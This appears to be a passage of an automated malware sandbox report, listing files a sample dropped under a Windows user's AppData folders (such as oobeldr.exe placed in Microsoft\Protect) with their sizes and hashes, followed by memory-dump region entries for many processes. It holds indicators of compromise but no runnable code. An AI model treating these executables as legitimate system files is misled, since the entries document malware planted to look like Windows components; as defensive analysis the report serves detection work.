SHA10cdea96bfbbbddb879f35ced74620292c2cbf687
SHA256e623fb7f8f26f1222cc777af5a585acbf9cc5e1f72f09aeae3dcee8c518864e0
SHA512558cdc2c80a6d9789d0faece85d17c37171305af4324c0176b369cdf4bde6472c07547ece539493ba5c79c6d2d9ca3699aff97182fee4ffff71f0436e7376aba
-
C:\Users\Admin\AppData\Roaming\IJkEgC91.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\IJkEgC91.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\IJkEgC91.exeFilesize
1MB
MD5cb8707966985e4beaee09da7844c35dc
SHA1a1781c59f2a7de837ac6abaeb1f75516737f6ce3
SHA2568a78e2f08052660fdedbb04ec46b40bde9b20b81b2b4695595cfefed1cd5bc40
SHA512e203e32277b9ef3ac98a4ffecd7ba0130d8635bf784ecc4247df3a7bd8018956b3302783ce48a124db7a6e67dba9619d3511db7a80b3489eacb0760156953e76
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exeFilesize
785KB
MD516c2d163dc4befc51cb1f9fff79176c6
SHA15c4d146316f45afe7193d45ceea6be614f672e9f
SHA256144c1d3420429517a83b91bc35424b519d2c79b7d9c78cfe14ad84b7ac7e2e87
SHA5123d48b7da52586d57a6c28154d2c6a8a212eccd94a8fb300a0cac954b97f8041099cda6e9e9e3c1b37d1cc56b8501a84016a8203b9bafd5c226828cef3d57101b
-
C:\Users\Admin\AppData\Roaming\o2lg73DX.exeFilesize
838KB
MD5209b46e2c5bd5e744733d3eb793ea42a
SHA132ae88f0917440f7dc084c5246e8d43378918f9d
SHA256811a515786324b20911c7f283d13b7a714f8fcd42c2662c014b3f9636f109ef0
SHA51236dfe4308950d7aa48d939e77ce73af0d5abc05df64574026d940abd66e05236757dcb9e2af176adebb92e31f8794c77ad39521066decb9e7466621da91612a9
-
C:\Users\Admin\AppData\Roaming\o2lg73DX.exeFilesize
838KB
MD5209b46e2c5bd5e744733d3eb793ea42a
SHA132ae88f0917440f7dc084c5246e8d43378918f9d
SHA256811a515786324b20911c7f283d13b7a714f8fcd42c2662c014b3f9636f109ef0
SHA51236dfe4308950d7aa48d939e77ce73af0d5abc05df64574026d940abd66e05236757dcb9e2af176adebb92e31f8794c77ad39521066decb9e7466621da91612a9
-
C:\Users\Admin\AppData\Roaming\o2lg73DX.exeFilesize
838KB
MD5209b46e2c5bd5e744733d3eb793ea42a
SHA132ae88f0917440f7dc084c5246e8d43378918f9d
SHA256811a515786324b20911c7f283d13b7a714f8fcd42c2662c014b3f9636f109ef0
SHA51236dfe4308950d7aa48d939e77ce73af0d5abc05df64574026d940abd66e05236757dcb9e2af176adebb92e31f8794c77ad39521066decb9e7466621da91612a9
-
memory/764-235-0x0000021FC79D0000-0x0000021FC7A10000-memory.dmpFilesize
256KB
-
memory/764-231-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/764-232-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/764-229-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/764-244-0x0000021FC7990000-0x0000021FC79B0000-memory.dmpFilesize
128KB
-
memory/764-243-0x0000021FC7990000-0x0000021FC79B0000-memory.dmpFilesize
128KB
-
memory/764-242-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/764-234-0x0000000140000000-0x00000001407CA000-memory.dmpFilesize
7MB
-
memory/764-233-0x0000021FC7840000-0x0000021FC7860000-memory.dmpFilesize
128KB
-
memory/764-230-0x0000000140344454-mapping.dmp
-
memory/912-188-0x0000000000000000-mapping.dmp
-
memory/912-206-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/912-204-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/1088-132-0x0000000000FD0000-0x00000000010A6000-memory.dmpFilesize
856KB
-
memory/1088-136-0x0000000005D90000-0x0000000005DE0000-memory.dmpFilesize
320KB
-
memory/1088-137-0x0000000006620000-0x00000000066D2000-memory.dmpFilesize
712KB
-
memory/1088-138-0x0000000006A80000-0x0000000006AA2000-memory.dmpFilesize
136KB
-
memory/1088-134-0x0000000005AA0000-0x0000000005B32000-memory.dmpFilesize
584KB
-
memory/1088-133-0x0000000005FB0000-0x0000000006554000-memory.dmpFilesize
5MB
-
memory/1088-135-0x0000000005A60000-0x0000000005A6A000-memory.dmpFilesize
40KB
-
memory/1148-172-0x0000000140000000-mapping.dmp
-
memory/1148-171-0x0000000140000000-0x0000000140078000-memory.dmpFilesize
480KB
-
memory/1148-182-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/1148-225-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/1536-193-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1536-180-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1536-175-0x0000000000000000-mapping.dmp
-
memory/1536-176-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1688-159-0x0000000000F20000-0x0000000000FEA000-memory.dmpFilesize
808KB
-
memory/1688-156-0x0000000000000000-mapping.dmp
-
memory/2064-170-0x0000000000000000-mapping.dmp
-
memory/2908-200-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2908-226-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2908-202-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2908-198-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2908-195-0x0000000000000000-mapping.dmp
-
memory/2908-196-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3184-184-0x0000000000000000-mapping.dmp
-
memory/3264-140-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3264-139-0x0000000000000000-mapping.dmp
-
memory/3264-143-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3264-147-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3264-163-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3264-142-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3420-216-0x0000000000000000-mapping.dmp
-
memory/3500-148-0x0000000000000000-mapping.dmp
-
memory/3500-151-0x00000000004E0000-0x00000000005B8000-memory.dmpFilesize
864KB
-
memory/3720-236-0x0000000000000000-mapping.dmp
-
memory/4176-219-0x0000000000000000-mapping.dmp
-
memory/4236-215-0x0000000007B10000-0x0000000007B2A000-memory.dmpFilesize
104KB
-
memory/4236-190-0x0000000003250000-0x0000000003286000-memory.dmpFilesize
216KB
-
memory/4236-212-0x0000000074DD0000-0x0000000074E1C000-memory.dmpFilesize
304KB
-
memory/4236-213-0x0000000006D60000-0x0000000006D7E000-memory.dmpFilesize
120KB
-
memory/4236-214-0x0000000008160000-0x00000000087DA000-memory.dmpFilesize
6MB
-
memory/4236-205-0x0000000006810000-0x000000000682E000-memory.dmpFilesize
120KB
-
memory/4236-189-0x0000000000000000-mapping.dmp
-
memory/4236-211-0x0000000006DD0000-0x0000000006E02000-memory.dmpFilesize
200KB
-
memory/4236-218-0x0000000007B80000-0x0000000007B8A000-memory.dmpFilesize
40KB
-
memory/4236-199-0x00000000058F0000-0x0000000005956000-memory.dmpFilesize
408KB
-
memory/4236-220-0x0000000007D90000-0x0000000007E26000-memory.dmpFilesize
600KB
-
memory/4236-221-0x0000000007D40000-0x0000000007D4E000-memory.dmpFilesize
56KB
-
memory/4236-222-0x0000000007E50000-0x0000000007E6A000-memory.dmpFilesize
104KB
-
memory/4236-223-0x0000000007E30000-0x0000000007E38000-memory.dmpFilesize
32KB
-
memory/4236-201-0x0000000006150000-0x00000000061B6000-memory.dmpFilesize
408KB
-
memory/4236-192-0x0000000005A70000-0x0000000006098000-memory.dmpFilesize
6MB
-
memory/4380-217-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4380-179-0x0000000000000000-mapping.dmp
-
memory/4380-181-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4380-203-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4380-186-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4448-187-0x0000000000000000-mapping.dmp
-
memory/4776-191-0x0000000000000000-mapping.dmp
-
memory/4904-169-0x000002ACF87C0000-0x000002ACF87E2000-memory.dmpFilesize
136KB
-
memory/4904-174-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/4904-168-0x000002ACF8990000-0x000002ACF8A42000-memory.dmpFilesize
712KB
-
memory/4904-167-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/4904-166-0x000002ACF7510000-0x000002ACF7560000-memory.dmpFilesize
320KB
-
memory/4904-164-0x00007FF8F2BC0000-0x00007FF8F3681000-memory.dmpFilesize
10MB
-
memory/4904-155-0x000002ACF5060000-0x000002ACF519A000-memory.dmpFilesize
1MB
-
memory/4904-152-0x0000000000000000-mapping.dmp
-
memory/4944-241-0x0000000000000000-mapping.dmp
-
memory/5076-160-0x0000000000000000-mapping.dmp
-
memory/5076-165-0x0000000000120000-0x000000000022A000-memory.dmpFilesize
1MB